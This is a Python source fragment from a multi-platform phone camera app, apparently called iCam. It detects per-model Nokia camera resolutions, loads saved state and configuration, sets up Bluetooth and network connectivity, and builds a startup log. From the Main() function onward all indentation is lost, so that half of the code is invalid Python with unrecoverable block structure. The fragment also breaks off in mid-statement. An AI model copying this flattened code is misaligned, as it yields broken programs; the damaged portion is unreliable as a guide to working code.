            print "camera.image_sizes(RGB12) = %s" % \
                str(camera.image_sizes("RGB12"))
            print "camera.image_sizes(JPEG_JFIF) = %s" % \
                str(camera.image_sizes("JPEG_JFIF"))
            sys.stdout.flush()
        """
        #cameraPhotoSizes_JPEG_Exif = cameraPhotoSizes_JPEG_Exif + [(0, 0)]
        if numCamerasSupported == 2:
            try:
                # Retrieving the supported resolutions for the VGA camera:
                """
                camera.release()
                #camera._my_camera = camera._camera.Camera(1)
                camera.UseCamera(1)
                """
                GeneralUseCameraS60(1)
                cameraPhotoSizes_JPEG_Exif[1] = camera.image_sizes("JPEG_Exif")
                cameraPhotoSizes_RGB24[1] = camera.image_sizes("RGB")
                if camera2IsImported:
                    # camera._camera.SetCameraParameters(aMode, aSize, aZoom,
                    # aFlash, aExp, aWhite)
                    # camera._camera.SetCameraSettings()
                    DebugPrint(
                        "camera._my_video.GetVideoRecordFormatsCount() = %d.\n" % \
                        camera._my_video.GetVideoRecordFormatsCount() +
                        "camera._my_video.GetVideoControllersCount() = %d." % \
                        camera._my_video.GetVideoControllersCount())
                    # Probe camera 1 first, then camera 0, so that camera 0
                    # is the one left selected at the end of the loop.
                    for cId in range(1, -1, -1):
                        cameraVideoFormats[cId] = \
                            camera.GetVideoFrameFormatsSupportedStringList()
                        cameraVideoFrameSizes[cId] = \
                            camera.GetVideoFrameSizes("EFormatYUV420Planar")
                        cameraVideoModes[cId] = \
                            camera.GetVideoFrameRates("EFormatYUV420Planar")
                        localVideoMode[cId] = \
                            (cameraVideoModes[cId][localVideoModeIndex[cId]]["size"],
                            cameraVideoModes[cId][localVideoModeIndex[cId]]["rate"])
                        # cameraVideoModes[1] = ...
                        myText = "The %s camera:\n" % cameraStr[cId]
                        myText += " Video formats supported: " \
                            "cameraVideoFormats[%d] = %s.\n" % \
                            (cId, str(cameraVideoFormats[cId]))
                        myText += " TCameraInfo.iVideoFrameFormatsSupported " \
                            "= 0x%X.\n" % \
                            camera._my_camera.video_formats()
                        myText += " Video frame sizes supported for mode " \
                            "EFormatYUV420Planar: " \
                            "cameraVideoFrameSizes[%d] = %s.\n" % \
                            (cId, str(cameraVideoFrameSizes[cId]))
                        #myText += " Video frame rates supported: %s.\n" % \
                        # cameraVideoModes[1]
                        myText += " Video frame rates supported for mode " \
                            "EFormatYUV420Planar: " \
                            "cameraVideoModes[%d] = %s.\n" % \
                            (cId, str(cameraVideoModes[cId]))
                        if cId == 0:
                            myText += " Video frame sizes supported for mode " \
                                "EFormatYUV422: %s.\n" % \
                                str(camera.GetVideoFrameSizes("EFormatYUV422"))
                            myText += " Video frame rates supported for mode " \
                                "EFormatYUV422: %s.\n" % \
                                str(camera.GetVideoFrameRates("EFormatYUV422"))
                            myText += " Video frame sizes supported for mode " \
                                "EFormatEncodedH264: %s.\n" % \
                                str(camera.GetVideoFrameSizes("EFormatEncodedH264"))
                            myText += " Video frame rates supported for mode " \
                                "EFormatEncodedH264: %s.\n" % \
                                str(camera.GetVideoFrameRates("EFormatEncodedH264"))
                        """
                        N82: Video frame rates supported
                        [{'size_index': 0, 'rate': 30.0, 'size': (640, 480)},
                        {'size_index': 0, 'rate': 15.0, 'size': (640, 480)},
                        {'size_index': 1, 'rate': 30.0, 'size': (320, 240)},
                        {'size_index': 1, 'rate': 15.0, 'size': (320, 240)},
                        {'size_index': 2, 'rate': 30.0, 'size': (176, 144)},
                        {'size_index': 2, 'rate': 15.0, 'size': (176, 144)}].
                        """
                        for videoMode in cameraVideoFormats[cId]:
                            """
                            for i in range(camera._my_camera.max_frame_size()):
                                fs = camera._my_camera.frame_size(
                                    camera.formatMap[videoMode], i)
                            """
                            for i in range(camera._my_camera.
                                GetNumVideoFrameSizesSupported()):
                                frameSize = camera._my_camera.frame_size(
                                    camera.formatMap[videoMode], i)
                                if frameSize != (0, 0):
                                    myText += " videoMode %s, index %d, " \
                                        "resolution %4d x %4d\n" % \
                                        (videoMode, i, frameSize[0],
                                        frameSize[1])
                            # ~ for f in range(camera._my_camera.max_frame_rate()):
                            # ~ r=camera._my_camera.frame_rate(camera.
                            # formatMap[videoMode], f, i,
                            # camera.exposuremap['auto'])
                            # ~ log(" rate: index %d, value %5.2f" % (f, r))
                        DebugPrint(myText)
                        if cId == 1:
                            #!!!!
                            #camera.release()
                            ##camera._my_camera = camera._camera.Camera(0)
                            #camera.UseCamera(0)
                            GeneralUseCameraS60(0)
                        elif cId == 0:
                            # We send this text msg to the iCam server a bit later, so we save it.
                            myTextMainCamera2Video = myText
            except:
                DebugPrintErrorTrace()
    # Every (Symbian) phone should support this resolution.
    #localVideoMode = [((176, 144), 15.0), ((176, 144), 15.0)]
    DebugPrint(
        "cameraPhotoSizes_JPEG_Exif[0] = %s\n" % \
        str(cameraPhotoSizes_JPEG_Exif[0]) + \
        "cameraPhotoSizes_RGB24[0] = %s" % str(cameraPhotoSizes_RGB24[0]))
    if numCamerasSupported == 2:
        DebugPrint("cameraPhotoSizes_JPEG_Exif[1] = %s\n" % \
            str(cameraPhotoSizes_JPEG_Exif[1]) + \
            "cameraPhotoSizes_RGB24[1] = %s" % \
            str(cameraPhotoSizes_RGB24[1]))
    # In case it returns the wrong resolutions for "portrait" mode
    # instead of "landscape" mode.
    if phoneModel in ["NokiaN95", "NokiaN82", "NokiaX6", "NokiaE5",
        "NokiaE72"] and \
        cameraPhotoSizes_JPEG_Exif[0][0] != (2592, 1944):
        cameraPhotoSizes_JPEG_Exif[0] = [
            (2592, 1944),
            (2048, 1536),
            (1600, 1200),
            (1024, 768),
            (640, 480)
        ]
        DebugPrint("Corrected cameraPhotoSizes_JPEG_Exif[0] to %s" % \
            str(cameraPhotoSizes_JPEG_Exif[0]))
    elif phoneModel == "NokiaE7":
        if cameraPhotoSizes_JPEG_Exif[0][0] != (3264, 2448):
            cameraPhotoSizes_JPEG_Exif[0] = [
                (3264, 2448),
                (3264, 1832),
                (2592, 1944),
                (2592, 1456),
                (2048, 1536),
                (1600, 1200),
                (1280, 960),
                (1024, 768),
                (640, 480),
            ]
            DebugPrint( ("Corrected cameraPhotoSizes_JPEG_Exif[0] to %s.\n" % \
                str(cameraPhotoSizes_JPEG_Exif[0])) )
        if cameraPhotoSizes_JPEG_Exif[1][0] != (640, 480):
            cameraPhotoSizes_JPEG_Exif[1] = [(640, 480), (320, 240)]
            cameraPhotoSizes_RGB24[1] = [(640, 480), (320, 240)]
            DebugPrint( "Corrected cameraPhotoSizes_RGB24[1] to %s." % \
                str(cameraPhotoSizes_RGB24[1]) )
    elif (phoneModel == "NokiaN8") and \
        (cameraPhotoSizes_JPEG_Exif[0][0] != (4000, 3000)):
        cameraPhotoSizes_JPEG_Exif[0] = [
            (4000, 3000),
            (4000, 2248),
            (3264, 2448),
            (3264, 1832),
            (2592, 1944),
            (2592, 1456),
            (2048, 1536),
            (1600, 1200),
            (1280, 960),
            (1024, 768),
            (640, 480)
        ]
        DebugPrint("Corrected cameraPhotoSizes_JPEG_Exif[0] to %s." % \
            str(cameraPhotoSizes_JPEG_Exif[0]))
        """
        !!!!if cameraPhotoSizes_JPEG_Exif[1][0] != (640, 480):
            cameraPhotoSizes_JPEG_Exif[1] = [(640, 480), (320, 240)]
        """
    elif (phoneModel in ["Nokia6120", "NokiaE63"]) and \
        (cameraPhotoSizes_JPEG_Exif[0][0] != (1600, 1200)):
        cameraPhotoSizes_JPEG_Exif[0] = [
            (1600, 1200),
            (1152, 864),
            (640, 480),
            (320, 240)
        ]
        DebugPrint("Corrected cameraPhotoSizes_JPEG_Exif[0] to %s." % \
            str(cameraPhotoSizes_JPEG_Exif[0]))
    """
    #N97, E75
    elif (phoneModel == "NokiaC7") and (cameraPhotoSizes_JPEG_Exif[0][0] != \
        (2048, 1536)):
        cameraPhotoSizes_JPEG_Exif[0] = [(2048, 1536), (1600, 1200),
            (1280, 960), (1024, 768), (640, 480)]
        DebugPrint("Corrected cameraPhotoSizes_JPEG_Exif[0] to %s" %
            str(cameraPhotoSizes_JPEG_Exif[0]))
    """
#!!!!TODO: If we do the correction above, we could get in take_photo() exception "ValueError: Size not supported for camera"
#!!!!TODO: think how to do exactly. Maybe do again GeneralUseCameraS60(0), (1) with the right orientation!!!! Or maybe take out the check in camera2.take_photo(). Or, in iCam.TakePhotoAndUpload() if you get exception use the next resolution.
#camera.device[0].image_size(modeMap[mode]) ~= cameraPhotoSizes_JPEG_Exif[0]
#camera.device[1].image_size(modeMap[mode]) ~= cameraPhotoSizes_JPEG_Exif[1]
def MainSetCameraParams():
    """
    Detect camera capabilities and initialise sensors for the current OS.

    On Symbian S60 this optionally connects the accelerometer/rotation
    sensors (N95/N82 only) and delegates the real probing to
    SetCameraParamsS60(); every other supported platform gets a single
    QVGA (320x240) camera as a conservative default.  Afterwards the
    per-camera video-capability slots are normalised and the persisted
    video-mode indices are clamped to the detected ranges.
    """
    global sensorsAvailable
    #global accSensor, rotSensor
    global numCamerasSupported
    global cameraPhotoSizes_JPEG_Exif, cameraPhotoSizes_RGB24
    global cameraVideoFormats, cameraVideoFrameSizes, cameraVideoModes
    global localVideoModeIndex
    global localVideoMode
    DebugPrint("Entered MainSetCameraParams(): camera params and init sensors.")
    # Baseline video mode every (Symbian) phone should support.
    # !!!!TODO: differentiate if phone has 0, 1 or 2 cameras
    localVideoMode = [((176, 144), 15.0), ((176, 144), 15.0)]

    def ApplySingleCameraDefaults():
        # Conservative defaults: one QVGA camera, no sensors.  Used on every
        # platform where we do not (or cannot) probe the real hardware.
        global sensorsAvailable, numCamerasSupported
        global cameraPhotoSizes_JPEG_Exif, cameraPhotoSizes_RGB24
        sensorsAvailable = ""
        numCamerasSupported = 1
        cameraPhotoSizes_JPEG_Exif = [[(320, 240)], []]
        cameraPhotoSizes_RGB24 = [[(320, 240)], []]
        # localPhotoResolutionIndex[0]

    if ANDROID_OS:
        ApplySingleCameraDefaults()
    elif SYMBIAN_S60_OS:
        # elif SYMBIAN_OS:
        try:
            if logAccelerometerAndRotationSensors:
                if phoneModel in ["NokiaN95", "NokiaN82"]:
                    accSensor = sensor.Sensor(sensor.sensors()["AccSensor"]["id"],
                        sensor.sensors()["AccSensor"]["category"])
                    accSensor.connect(AccSensorCallback)
                    rotSensor = sensor.Sensor(sensor.sensors()["RotSensor"]["id"],
                        sensor.sensors()["RotSensor"]["category"])
                    rotSensor.connect(RotSensorCallback)
            SetCameraParamsS60()
        except:
            DebugPrintErrorTrace()
    elif SYMBIAN_UIQ_OS:
        ApplySingleCameraDefaults()
    elif iOS_PYOBJC:
        ApplySingleCameraDefaults()
    elif WINDOWS_CE_OS_PYTHONCE:
        ApplySingleCameraDefaults()
    elif RASPBIAN_OS:
        ApplySingleCameraDefaults()
    # localVideoMode = [((320, 240), 15.0), ((176, 144), 15.0)]
    # localVideoMode = [(640, 480), (176, 144)]
    if numCamerasSupported == 0:
        # No camera at all: clear the main-camera capability slots.
        cameraVideoFormats[0] = []
        cameraVideoFrameSizes[0] = []
        cameraVideoModes[0] = []
    else:
        if cameraVideoFormats[0] == []:
            # Main camera reported no video formats: fall back to QCIF@15fps.
            cameraVideoFrameSizes[0] = [(176, 144)]
            cameraVideoModes[0] = [{"rate": 15.0, "size": (176, 144)}]
        if numCamerasSupported == 2:
            if cameraVideoFormats[1] == []:
                cameraVideoFrameSizes[1] = [(176, 144)]
                cameraVideoModes[1] = [{"rate": 15.0, "size": (176, 144)}]
        else:
            # Single camera: make sure the secondary-camera slots are empty.
            cameraVideoFormats[1] = []
            cameraVideoFrameSizes[1] = []
            cameraVideoModes[1] = []
    # In case something changed (e.g., on S60 the camera2 module doesn't
    # exist), make sure the stored indices are within the valid range.
    # TODO!!!! This check is repeated in RecordConfigMenu() so REUSE CODE.
    for slot in range(2):
        if not (0 <= localVideoModeIndex[slot] < len(cameraVideoModes[slot])):
            localVideoModeIndex[slot] = 0
###########################################################################
###########################################################################
##########################END CAMERA PARAMETER SET#########################
###########################################################################
###########################################################################
def MainLoadStateAndConfig():
    """
    Load the persisted application state and the local configuration.

    Reads the saved state file (or its backup), fixes up an empty access
    point name on the internet-proxy phone, loads the local config file
    and - when running as the Bluetooth server - the most recent Bluetooth
    message timestamps.  All failures are logged and swallowed; stateLoaded
    is set True unconditionally at the end.
    """
    global accessPointName
    global stateLoaded
    try:
        DebugPrint("MainLoadStateAndConfig(): Reading configuration.")
        #!!!!TODO: we load again the state, but now we have std*.txt created.
        stateWasRead = LoadStateFromFile(STATE_PATH_FILENAME)
        if stateWasRead:
            DebugPrint("MainLoadStateAndConfig(): Read configuration from %s " \
                "(or its backup if this file doesn't exist)." % \
                STATE_PATH_FILENAME)
        else:
            DebugPrint("MainLoadStateAndConfig(): LoadStateFromFile() " \
                "ret False.")
        # Preserve this order of initializing the state variables.
        if deviceId == INTERNET_PROXY_PHONE_DEVICE_ID and \
            accessPointName == u"":
            # The proxy phone needs a usable default access point.
            accessPointName = u"RDS"
            DebugPrint("MainLoadStateAndConfig(): accessPointName " \
                "is empty so made it %s." % str(accessPointName))
        LoadLocalConfigFromFile(LOCAL_CONFIG_PATH_FILENAME)
        if bluetoothMode == 1:
            # Acting as the BT server: restore the last-message timestamps.
            LoadBtMsgMostRecentTime()
        DebugPrint("Exiting MainLoadStateAndConfig().")
    except:
        DebugPrintErrorTrace()
    stateLoaded = True
def Main():
global LOCAL_FOLDER
# global myTimer
global localPhotoResolution, localVideoMode, localQualityIndex
global photoResolutionStr, photoModeStr, pauseIntervalStr, \
exposureStr, whiteBalanceStr, flashStr
global digitalZoom, photoResolutionIndex, \
localPhotoResolutionIndex, photoModeIndex, photoQuality, \
pauseInterval, reactiveLoopOpsIndex , exposureIndex, \
whiteBalanceIndex, flashIndex
global audioRecordDuration, videoRecordDuration, rotateDegreesImage
global mobileCountryCode, mobileNetworkCode, locationAreaCode, \
cellId # GSM location info
global signalStrength, signalUnits
global accessPointName, bluetoothMode
global gpsInfo, readGPS
global cameraPhotoSizes_JPEG_Exif, cameraPhotoSizes_RGB24
global cameraVideoFormats, cameraVideoFrameSizes, cameraVideoModes
global myMaxRamdriveSize
global numCamerasSupported
global deviceId, phoneModel, orientationForThisPhoneModel
global pyS60VersionNumber
global bluetoothSelfAddress, bluetoothSelfName
global accessPointRetryConnect
global startButtonPressed, startAutomatically
global STATE_PATH_FILENAME
global sensorsAvailable
global stateLoaded
global uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer
global MY_DEBUG_UPLOAD_MSG
global OSName
DebugPrint("Entered Main().")
#EraseOldestFilesAndMessages()
if False:
EraseOldestFilesFromFolderWithFileCountQuota(LOCAL_FOLDER,
filterString="stdout_",
fileCountQuota=100)
EraseOldestFilesFromFolderWithFileCountQuota(LOCAL_FOLDER,
filterString="stderr_",
fileCountQuota=100)
MainLoadStateAndConfig()
LoadMDExtensionScript()
global OSName
if ANDROID_OS:
OSName = "Android"
elif SYMBIAN_S60_OS:
# Put S60 as well.
OSName = "Symbian"
elif SYMBIAN_UIQ_OS:
OSName = "Symbian UIQ"
elif iOS_PYOBJC:
OSName = "iOS"
elif UNIX_OS:
OSName = "UNIX"
elif WINDOWS_OS:
OSName = "Windows"
elif WINDOWS_CE_OS_PYTHONCE:
#OSName = "Windows"
OSName = "WinCE"
phoneModel = GetPhoneModel()
# Here, the orientationForThisPhoneModel could be wrong.
#MainLog2()
if ANDROID_OS:
#myRes = DialogGetInput("blabla", "blamore", "blaInit")
#DisplayNote(myRes)
pass
elif SYMBIAN_OS:
SetupSymbian()
"""
while True:
e32.ao_sleep(1.0)
"""
#LoadMDExtensionScript()
# DisplayNote("Testing.")
#phoneModel = GetPhoneModel()
MainSetUI()
# We do this to try to avoid having issues with the read camera resolution:
SleepAndPetWatchdog(2.0)
"""
MainSetCameraParams() needs to be after MainSetUI() because MainSetUI()
sets the orientation (on S60) and otherwise the read resolutions
could be wrong.
"""
MainSetCameraParams()
MainLog2()
#MainSetCameraParams()
if False: #deviceId == IMEI_E7:
# We start some profiling
"""
# Doesn't work on PyS60: - gives exception:
# profile.py, line 462, in runctx
# NameError: name 'GetGSMLocation' is not defined
profile.run("GetGSMLocation()")
#profile.run("print 1")
"""
pr = profile.Profile()
pr.runcall(GetGSMLocation)
filename = "profiling_data_iCam"
#filename = None
if filename is not None:
pr.dump_stats(filename)
"""
myProfile = hotshot.Profile("hotshot_stats")
myProfile.runcall(GetGSMLocation)
myProfile.close()
"""
else:
GetGSMLocation()
if ANDROID_OS:
myMaxRamdriveSize = -1
signalStrength = -1
signalUnits = "dbm"
accessPointName = u"[DEFAULT_AP]"
localPhotoResolutionIndex = [-1, -1]
elif SYMBIAN_S60_OS:
# elif SYMBIAN_OS:
try:
myMaxRamdriveSize = sysinfo.max_ramdrive_size()
except:
DebugPrintErrorTrace()
myMaxRamdriveSize = -1
try:
signalStrength = sysinfo.signal_dbm()
signalUnits = "dbm"
except:
DebugPrintErrorTrace()
try:
signalStrength = sysinfo.signal_bars()
signalUnits = "bars"
if signalStrength < 0:
signalStrength = NO_GSM_SIGNAL_STRENGTH
except:
signalStrength = NO_GSM_SIGNAL_STRENGTH
signalUnits = "none"
# accessPointName = u""
accessPointRetryConnect = True
DebugPrintErrorTrace()
elif SYMBIAN_UIQ_OS:
myMaxRamdriveSize = -1
signalStrength = -1
signalUnits = "dbm"
accessPointName = u"[DEFAULT_AP]"
localPhotoResolutionIndex = [-1, -1]
elif iOS_PYOBJC:
myMaxRamdriveSize = -1
signalStrength = -1
signalUnits = "dbm"
accessPointName = u"[DEFAULT_AP]"
localPhotoResolutionIndex = [-1, -1]
elif UNIX_OS:
myMaxRamdriveSize = -1
signalStrength = -1
signalUnits = "dbm"
numCamerasSupported = 0
accessPointName = u"Linux_PC_Internet_Connection"
localPhotoResolutionIndex = [-1, -1]
elif WINDOWS_OS:
myMaxRamdriveSize = -1
signalStrength = -1
signalUnits = "dbm"
numCamerasSupported = 0
accessPointName = u"Windows_PC_Internet_Connection"
localPhotoResolutionIndex = [-1, -1]
"""
YouTubeVideoUploadThroughProxy(pathFileName = "./CurrentSymLink_1.3gp",
fileName = "CurrentSymLink_1.3gp", aKeyword = "myDeviceId",
crtTime = None, mediaTimeStr = "", mediaDateStr = "",
deviceId = "", cameraId = 0)
return
"""
"""
res = UploadStateAndFileAndStoreState("[NOT_USED_DEVICE_ID]", 0,
"VIDEO0900.mp4", "./VIDEO0900.mp4", ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_STATE_AND_FILE)
return
"""
elif WINDOWS_CE_OS_PYTHONCE:
myMaxRamdriveSize = -1
signalStrength = -1
signalUnits = "dbm"
accessPointName = u"[DEFAULT_AP]"
localPhotoResolutionIndex = [-1, -1]
##!!!!!!!Put all localPhotoResolutionIndex = [-1, -1] above and the code below in MainSetCameraParams()
# JPEG_Exif for Main camera and RGB24 for VGA camera.
photoModeIndex = [3, 2]
"""
if phoneModel in ["Nokia6120", "NokiaN95", "NokiaN82", "NokiaN8"]:
# JPEG_Exif for Main camera and RGB24 for VGA camera.
photoModeIndex = [3, 2]
elif phoneModel == "Nokia6680":
# RGB24 for Main camera and RGB24 for VGA camera
#photoModeIndex = [2, 2]
# For Nokia 6680 JPEG_Exif for Main camera and RGB24 for VGA
# camera - JPEG_Exif and 1280x960 gives out of mem exception (but it
# appears RGB24 and 1280x960 does not)- see!!!!
# Logs\Nokia6680\34_JPEG_Exif_imageMode_rear_capture_error_Out_of_mem
photoModeIndex = [3, 2]
else:
# For Nokia 6680 JPEG_Exif for Main camera and RGB24 for VGA
# camera - JPEG_Exif and 1280x960 gives out of mem exception (but it
# appears RGB24 and 1280x960 does not)- see!!!!
# Logs\Nokia6680\34_JPEG_Exif_imageMode_rear_capture_error_Out_of_mem
photoModeIndex = [3, 2]
"""
"""
On Nokia 6680, setting the photo mode when calling take_photo() returns:
KErrNoMemory for RGB12
"Size not supported for camera" if we give RGB16
"Size not supported for camera" if we give JPEG_Exif
RGB24 gives error
for pic.resize (from SetDigitalZoom)
SymbianError: [Errno -4] Error resizing image:KErrNoMemory
OR
for take_photo: SymbianError: [Errno -4] KErrNoMemory
"""
"""
if GetFreeRAM() < cameraPhotoSizes[0][0] * cameraPhotoSizes[0][1] * 3 * 2:
# If we have less than 6MB RAM use 2nd biggest resolution (for Nokia
# 6680, we had ~5MB free and when trying to capture at biggest
# res - 1280x968 - and resizing it was running out of memory).
#if GetFreeRAM() < 6 * 1024 * 1024:
localPhotoResolutionIndex = [1, len(cameraPhotoSizes) - 1]
# On Nokia 6680, using localPhotoResolutionIndex[0] = 0 (i.e., 1280x960
# photo resolution for Main camera) makes take_photo give error:
# "SymbianError: [Errno -4] KErrNoMemory" even if we have 6.1MB free
# on the C drive.
# Or: "SymbianError: [Errno -4] Error resizing image:KErrNoMemory"
# See Logs\Nokia6680\14, 15 and 16
else:
# The resolution indices for the Main (index 0) and VGA (index 1)
# camera, pointing at cameraPhotoSizes.
localPhotoResolutionIndex = [0, len(cameraPhotoSizes) - 1]
"""
if numCamerasSupported == 1:
# The resolution indices for the Main (index 0) and VGA (index 1)
# camera, pointing at cameraPhotoSizes.
localPhotoResolutionIndex = [0, -1]
elif numCamerasSupported == 2:
# The resolution indices for the Main (index 0) and VGA (index 1)
# camera, pointing at cameraPhotoSizes.
localPhotoResolutionIndex = [0, len(cameraPhotoSizes_RGB24[1]) - 1]
DebugPrint("Main(): localPhotoResolutionIndex = %s" % \
str(localPhotoResolutionIndex))
"""
try:
UploadUnsentFILES()
except:
DebugPrintErrorTrace()
"""
"""
try:
# Basically telephone module can't be used on S60 2nd ed.
# phone_ext should be used instead.
#See http://discussion.forum.nokia.com/forum/showthread.php?120891-Bind-an-incoming-call
# "For 2nd edition it should be more difficult because there's no
# official function available for this.
# Try this : download SMSCoop in it there's a phone_ext.pyd
# extension. Install it in your phone.
# This extension provide similar functionalities."
telephone.call_state(TelephoneCallback)
#telephone.incoming_call()
except: #AttributeError ImportError:
exceptionType, exceptionValue, exceptionTraceback = sys.exc_info()
myText = "The telephone module does not work - most likely because " \
"you are using a 2nd edition S60 cellphone - reported " \
"to have issues with the telephone module. "\
"Exception details: %s." \
% repr( traceback.format_tb(exceptionTraceback) )
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(myText)
DebugPrintErrorTrace()
"""
# #########################################################################
# #########################################################################
# ########## By now the iCam UI and device params are set up. ##########
# #########################################################################
# #########################################################################
MainConnectivity()
# #########################################################################
# ########NOW PHONE SHOULD HAVE CONNECTIVITY - 3G and/or Bluetooth#########
# ###IMPORTANT: DO NOT UPLOAD OR DOWNLOAD ANYTHING BEFORE HERE, BECAUSE####
# ################IT MIGHT POP A MENU ASKING FOR ACCESS POINT##############
# #########################################################################
global sentBTMessageTo6680
if sentBTMessageTo6680 == 1:
"""
Since it is possible that iCam is stopped when power comes back and
we miss this event we have saved as part of state sentBTMessageTo6680
in order to check and act, if necessary.
"""
ExecuteCommands("send-command-via-bluetooth " + BT_ADDR_6680 + \
" set-pause-interval 240")
sentBTMessageTo6680 = 0
StoreState()
MainLog()
MainTestCommands()
MainStartReactiveLoops()
def MainConnectivity():
"""Bring the device online after the UI/camera setup done in Main().

Chooses/initializes the Bluetooth mode, connects to an Internet access
point when this device is not a Bluetooth client (mode 2), and performs
a one-shot NTP time sync.  Operates entirely through module globals;
returns nothing.
"""
global accessPointName, accessPointRetryConnect
global stateLoaded
DebugPrint("Entered MainConnectivity().")
stateLoaded = True
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
DisplayRedrawInfo()
# #########################################################################
# #########################################################################
# #### We set the bluetoothMode, and connect to the access point, if ###
# ##### appropriate - note that AP connection takes little on Symbian.#####
# ###### We also download any commands and execute them ASAP, at the ######
# ##### beginning - useful to prevent erroneous modes #####################
# #########################################################################
# #########################################################################
# bluetoothMode dispatch: -1 = not chosen yet (ask the user),
# 1 = Bluetooth server, 2 = Bluetooth client (no direct Internet access,
# per the bluetoothMode != 2 checks below).
if bluetoothMode == -1:
# if bluetoothServerAddress == "":
SelectBluetoothMode()
elif bluetoothMode == 1:
# BluetoothServer
BluetoothServerInitialize()
elif bluetoothMode == 2:
# BluetoothClient.
BluetoothClientDiscoverServer()
BluetoothClientInitializeInbox()
# This (also) has the effect of downloading commands received via BT
# - equivalent to DownloadCommands().
#if WINDOWS_OS == False:
if WINDOWS_OS:
pass
else:
BluetoothMessageListProcess(processJustNonSMF_BtMsgs=True)
SetLocalPhotoResolution()
"""
accessPointName = u""
accessPointRetryConnect = True
"""
if bluetoothMode == 2:
"""
or signalStrength == NO_GSM_SIGNAL_STRENGTH:
!!!!Remember or figure out when was the case
signalStrength == NO_GSM_SIGNAL_STRENGTH
useful.
It is not a good idea to check also
signalStrength == NO_GSM_SIGNAL_STRENGTH because
we can arrive in this case when there is no valid SIM card
or no SIM card at all.
"""
DebugPrint("Main(): Setting accessPointRetryConnect = True.")
accessPointRetryConnect = True
else:
# We can choose a WiFI or 3G Acess Point:
SelectAccessPointIfNoneAvailableAndConnectToIt()
# This function doesn't really connect to the Internet and works fast.
# thread.start_new_thread(
# SelectAccessPointIfNoneAvailableAndConnectToIt, ())
if deviceId == IMEI_E7:
appuifw.note(u"Connected to AP!", "info")
if bluetoothMode != 2: # ~IMPORTANT: we want to prevent to try to connect to the Internet
# TODO: Maybe we should synchronize more than once per run.
TimeSyncNTP()
# Disabled: iCam-server time sync (kept for reference).
if False:
# We attempt to synchronize the time with the iCam server:
if useiCamServer > 0:
TimeSyncWithiCamServer()
# Module-level cache of the extensive startup-info text built by MainLog2()
# and later uploaded by MainLog() when MY_DEBUG_UPLOAD_MSG is set.
myTextInit = ""
def MainLog2():
"""Build the extensive startup-information text and cache it in myTextInit.

Collects device, OS, Bluetooth, camera, memory, battery and
configuration details into one string.  Every section is wrapped in its
own try/except so a failing probe only drops that section (best-effort
logging).  The result is stored in the module global myTextInit and
echoed via DebugPrint(); nothing is uploaded here (MainLog() does that).
"""
global myTextInit
# myText1 = "Started application on %s." % datetime.datetime.now().ctime()
try:
myText = "<br/><br/>Started application on %s - %s version. " \
"Release time: %s. " % \
(GetCurrentDateTimeStringNice(), OSName,
CURRENT_RELEASE_TIME)
except:
myText = ""
DebugPrintErrorTrace()
try:
myText += "Python version: %s. " % str(sys.version_info)
except:
DebugPrintErrorTrace()
try:
myText += "deviceId = %s. phoneNumber = %s. " % (deviceId, phoneNumber)
"""
#From http://stackoverflow.com/questions/787776/find-free-disk-space-in-python-on-os-x
(see also http://ubuntuforums.org/showthread.php?t=961505):
if ANDROID_OS:
myStatVFS = os.statvfs("/sdcard")
elif SYMBIAN_OS:
myStatVFS = os.statvfs(r"C:")
myText += "Free drive space %d." % ((myStatVFS.f_bavail *
myStatVFS.f_frsize) / 1024)
#Java code from http://android.bigresource.com/Track/android-7gosN9ZDf/:
#StatFs stat = new StatFs(
# Environment.getExternalStorageDirectory().getAbsolutePath());
#stat.restat(
# Environment.getExternalStorageDirectory().getAbsolutePath());
#long available = ((long) stat.getAvailableBlocks() *
# (long) stat.getBlockSize());
"""
except:
DebugPrintErrorTrace()
try:
if ANDROID_OS:
# NOTE(review): ShowMap builds res but never returns it, so it
# returns None; the "Build" + ShowMap(...) concatenations below
# therefore raise TypeError, which the surrounding try/except
# swallows - the Build/Version/Model details are silently dropped.
# Confirm whether this is intended before changing it.
def ShowMap(myMap):
try:
res = ""
for (keyIter, valueIter) in myMap.iteritems():
# print k,"=",v
res += "%s = %s" % (keyIter, valueIter)
except:
DebugPrintErrorTrace()
myText1 = ""
try:
myText1 += "Build" \
+ ShowMap(myDroid.getConstants("android.os.Build").result)
except:
DebugPrintErrorTrace()
try:
myText1 += "Version" + ShowMap(myDroid.getConstants(
"android.os.Build$VERSION").result)
except:
DebugPrintErrorTrace()
try:
myText1 += "Model" + ShowMap(myDroid.getConstants(
"android.os.Build$MODEL").result)
except:
DebugPrintErrorTrace()
# DisplayNote(myText1)
myText += myText1 + "phoneModel = %s. Firmware version = %s.\n" % \
(str(phoneModel),
str(myDroid.getDeviceSoftwareVersion().result))
elif SYMBIAN_S60_OS:
# elif SYMBIAN_OS:
myText += "phoneModel = %s. Firmware version = %s. " \
"OS = Symbian version %s.\n" % \
(str(phoneModel), sysinfo.sw_version(),
sysinfo.os_version())
elif WINDOWS_CE_OS_PYTHONCE:
myText += "phoneModel = %s. OS = WinCE.\n" % str(phoneModel)
else:
pass
except:
DebugPrintErrorTrace()
try:
myText += "sys.platform = %s. " % sys.platform
except:
DebugPrintErrorTrace()
try:
if ANDROID_OS:
myText += "Python for Android version %s.\n" % "[NOT_AVAILAVABLE]"
elif SYMBIAN_OS:
# elif SYMBIAN_OS and SYMBIAN_S60_OS:
myText += "S60 version %s, pyS60VersionNumber = %d. " \
"PyS60 version info = %s.\n" % \
(S60_EDITION, pyS60VersionNumber,
e32.pys60_version_info)
elif WINDOWS_CE_OS_PYTHONCE:
myText += "PythonCE version %s.\n" % "[NOT_AVAILAVABLE]"
except:
DebugPrintErrorTrace()
try:
myText += "bluetoothSelfAddress = %s. bluetoothSelfName = %s. " \
"bluetoothMode = %d. \n" % \
(bluetoothSelfAddress, bluetoothSelfName, bluetoothMode)
except:
DebugPrintErrorTrace()
# Configuration and camera-capability dump (S60 only for the camera part).
try:
myText += "pauseInterval = %d. " \
"pauseIntervalGdata = %d. " \
"reactiveLoopOpsIndex = %d. " \
"sentBTMessageTo6680 = %d. " \
"numCamerasSupported = %d. cameraMode[0] = %d. " \
"cameraMode[1] = %d. orientationForThisPhoneModel = %s.\n" % \
(
pauseInterval,
pauseIntervalGdata,
reactiveLoopOpsIndex,
sentBTMessageTo6680,
numCamerasSupported,
